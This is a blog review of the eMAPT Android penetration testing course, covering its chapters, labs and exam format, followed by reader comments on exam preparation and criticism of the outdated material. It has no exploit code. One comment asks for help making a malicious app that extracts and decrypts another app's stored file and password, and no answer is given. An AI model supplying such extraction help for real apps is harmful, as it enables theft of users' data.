Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

eMAPT Review – Mobile Mischief Managed

Another eLearnSecurity course down, so here comes my eMAPT review!

eMAPT Review – Introduction

Note that this review will be Android only, as that is all I had completed by the time I took the exam. The exam is now Android only, but I plan on finishing up the iOS sections in the future. I may or may not write a review for that, depending on how it goes and if anyone wants one.

I will do my best to describe the Android half of the course as best I can. That said, of all of my eLS reviews, this will have the most negative feedback/constructive criticism. Keep in mind my other reviews, and the high regard I hold them in when reading this though.

Course Material – Ground Work

  • Android Architecture – this was a slightly heavy introduction (for me), but a great chapter. This chapter covered a ton about how the Android universe worked in general, as well as the similarities and differences to a standard Linux OS.
  • Setting up a testing environment – this was a shorter chapter, but it helped me get my environment ready for the rest of the course.
  • Android build process – this chapter was fairly self-explanatory. That said, this chapter helped me to understand how Java code became an android application, what an APK was, and where all the files lived.

Course Material – Fundamentals

  • Reversing APKs – this chapter was where the theories started to become actions. The Reversing APKs chapter introduced most of the tools that would be used throughout the course.
    I had used a few of these tools before, but his laid them all out in a concise and understandable order.
  • Device Rooting – the rooting chapter was a bit of a disappointment after reading the title. This chapter covered how a device root usually occurs, and how you maintain persistence afterwards. Unfortunately, I would have loved to see a real example of a simpler root exploit and the breakdown. I understand that some of these might be overly complicated, or hard to find versions for, but that would have made this chapter awesome.
  • Android Application Fundamentals – this chapter was rough. Not in a bad sense, but this chapter was incredibly in-depth and technical. The application fundamentals covered almost everything about how applications interact with each other, the system, browsers, etc. That said, I got a ton of security ideas from this chapter, and more than I expected stuck with me. If someone could only read one chapter of this course, I’d actually probably recommend this one.

Course Material – Vulnerabilities and Exploits

  • Network Traffic – the network traffic section helped explain certificate pinning, and the different issues that can occur in the mobile SSL environment. Getting mobile apps to proxy through Burp can occasionally be a hassle, and this is the main reason. There were also a few interesting attack vectors brought up here (stealing the private keys), and an interesting lab that I’ll cover below.
  • Device and Data Security – this helps solidify where files lived and what sort of security features protected them. This was also the chapter that mentioned the dangers of rooting,
    which are important to keep in mind for personal devices. Other than that, there were a few key vulnerabilities to check for, especially in older devices.
  • Tapjacking – tapjacking is very similar to clickjacking, only on a mobile device. That said, while it is easy to fix in theory, the real solution has proven problematic.

Course Material – Code Analysis

  • Static Code Analysis – the static analysis section was great, and finally started to bring in some automation into the material. From what I could tell, there were a lot of things that could be discovered through static analysis. These didn’t only include vulnerabilities, but mis-configurations as well as possible attack vectors for manual testing/fuzzing. I’ve heard mixed reviews about QARK, but it was pretty neat to automatically generate a PoC binary.
  • Dynamic Code Analysis

eMAPT Review – Labs

While the eMAPT has definitely improved since version 1, there are definitely still some problems (account required).

  • Reversing APKs – the first lab, and this definitely got me into the course. It’s fairly easy and straightforward, but it was great exploiting my first real vulnerability on a mobile device.
  • Network Traffic – this lab was pretty interesting to show cert pinning and how to defeat it. That said, I still don’t understand why it isn’t/wasn’t possible to just overwrite the pin value with my malicious version instead of removing it entirely.
  • Device and Data Security – I wasn’t actually able to get these APKs to work properly, even with API 16.
  • Tapjacking – it was kind of neat to use QARK to automatically generate an exploit, but that’s about all I can say about this lab.
  • Static Code Analysis – this was the first lab section that I really enjoyed. Sending a fake text to myself from a fake number (see below) was pretty neat. Using web vulnerabilities like directory traversal against a mobile application was super neat, as was learning how to do it over adb. My only real problem with this section was the huge disconnect between what it was calling SQL Injection (basically just running queries against a database) and what web courses call it (injecting malicious code into the middle of queries).
  • Dynamic Code Analysis – this section was pretty neat, and had a lot of good labs. There are examples of code injection similar to a web application, log sniffing to grab poor debugging statements (a real application had passwords being sent to a log…), and a few other ways of hitting intents.

eMAPT Review - Fake Text

eMAPT Review – Exam

The eMAPT exam was different from any other eLearnSecurity course that I’ve taken.

You do not submit a penetration testing report for this course, like you do with the others.

For the eMAPT exam, you are given a vulnerable Android application. From there you are to discover all the vulnerabilities and write a PoC Android application that exploits them.

Finding the vulnerabilities themselves took about 3-4 minutes, which felt great. That said, as a whole, the exam felt more at home in a Java class that I would have taken in the past. I spent most of the 3-4 hours that the exam took reading the Java API and remembering syntax.

In the end, my application was pretty neat (and worked), but I didn’t feel like a penetration tester of the application. From what I’ve seen in the industry, testers perform mobile tests similarly to web application engagements. You get the application, look for all vulnerabilities, and write-up a report. I’ve never had a colleague just write a PoC Android application and send that to a client in lieu of a report. Other than that, while the course suggests that one learn Java to better understand the applications, the material should clearly state that they will be programming.

eMAPT Review – Conclusion

Since I already got my feedback, I’m just waiting on the physical cert to arrive!

eMAPT Review - Passed

While I did have a few negative things to say about the course, I still really enjoyed it.

This was an interesting course, and my first real foray into the world of mobile exploitation. I may pick up The Mobile Application Hacker’s Handbook in the future to brush up and learn even more.

In the end though, I’m not terribly motivated to continue with mobile exploitation or research at this time. I think the lack of interest is because of my interaction and feelings towards the discipline, but the course also didn’t get me as excited as some of the earlier ones have.

All in all, this was a good course, but reminiscent of the eCPPT in its early days. Once it goes through one more iteration or so, it will be able to stand toe to toe with the rest of eLearnSecurity’s offerings. Until then, unless you compare it to some of their other courses, it is a great class in its own regard.

Up next for me is the eCRE once I finish my GXPN course and exam!

17 Comments

  1. Great review as usual! I have the bundle which includes this cert/course as well. Seems like you really have to be a programmer for this cert.

    • Thanks, and good luck!

      You don’t have to be a programmer per-se, but you’re definitely going to have to write code to pass the exam. I think someone can still do it, but you’ll have to modify the examples and read a bit about Android development. That said, I tried to make mine be a half decent application because of my programming background.

  2. Hi, thanks for the great review! i’m about to start the certification exam, but without the correlated course, i have some experience in mobile pt but from what i’ve seen the vulnerable application will contains only vulnerabilities exploitable from another apk right? Do you know any online resources with a comprehensive list of this vulnerabilities to search on?

    Thanks in advance!

    • Hi Pier, that’s awesome, and good lluck!

      As far as the vulnerabilities are concerned, they will be from your standard lists like OWASP Mobile.

      If you are familiar with mobile pentesting, then you may be fine. That said, it will also take some development work for your own APK, but that isn’t covered a ton in the course anyway.

  3. Hi Ray,

    I have finished all the android modules and thinking to take exam. What should I prepare for exam? How to know if I am ready to take exam?

    Thankss

    • If you’ve finished the Android modules, then you should be good to go for the exam.

      The course covers everything that you will need, other than MAYBE some development experience. That said, 100% of what you’ll need to write is an easy Google search away.

      Good luck!

      • Hi Ray,

        Took exam recently. I failed exam and it is tough for me. I dun have background java programming experience and not easy to build android application easily. I have over 2 years of pentest security consulting experience and as you mentioned, i never had client who want android exploit poc app. Overall, I like the course materials very well. However, the main drawback of this course is exam which is not realistic and should have been mentioned that there will be only programming.

        • Yea, I agree that I’ve never had to write a PoC app myself. That said, I was able to Google my way through all of the Android development, as I had never done it before either.

          It doesn’t have to be the prettiest app, it just has to work. I’m not sure why the exam is in that format though, as giving a report similar to the eCPPT etc. would make more sense.

          Good luck on your next attempt!

  4. dear Ray,
    i am trying to retrieve a file and data from a database of an application through my malicious application. now the file and the password are encrypted and i need to display them in plan text. i have been able to get the encrypted file to display in my app but can’t decrypt it. also still working on getting the text in the database. can you assist me on how to go about this.

  5. In my opinion, the eMAPT course was an absolute waste of time and money!

    1. It is completely outdated: The labs are so old, they cannot be compiled with a recent Android Studio version. Some of the examples only work with API version 17, which was released in 2012. Your exam app needs to target API 24, which was released in 2016. It is an unnecessary hurdle to make students downgrade their environment, only so the examiner won’t have to update their emulator.
    Modern vulnerabilities like XSS on webviews were not part of the course.
    The iOS tools and techniques are also hopelessly outdated. Current jailbreaks no longer support Cycript. There is no word about Frida.

    2. It is not useful: The course expects you to learn how to write an Android application, but doesn’t teach you how to do that.

    3. It’s not realistic: No mobile app pentester writes their own malicious apps to prove a point. The attacks in this course can be done much quicker in Drozer.

    4. The video materials are sloppy; the guy clicks around, trying to remember where the settings were.

    • While a bit harsh, I don’t completely disagree with you.

      1 – Yea, they were pretty out-of-date, which I thought was weird.

      2 – This was the ABSOLUTE worst part of the exam/course, and I’ve brought it up with executives.

      3 – Haha, completely agreed, I don’t know if they touched on Drozer or not. I know I used it for my exam though.

      4 – Eh, this can happen, and I don’t remember it being TOO horrible. That said, they have a ton of room for a huge v2 upgrade here.

  6. Hi Doyler,

    I have a big doubt. You need to exploit all the vulnerabilities that are into the app, using a PoC? or for example, you only have to exploit an exported activity and not all that you found.

    Thank you!

    • You need to exploit the vulnerabilities IN the provided application, but using an Android app that you also develop yourself.

      And yea, you need to exploit any and all vulnerabilities that you find, just like an actual test.

  7. Hello,

    what version of android studio did you use to compile in api-24? the current ones generate an error and ask for a lot of changes in the versions of dependencies.

    • I probably used whatever was the newest version at the time. If the course material calls out a specific Studio or SDK version, you’ll want to use that.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.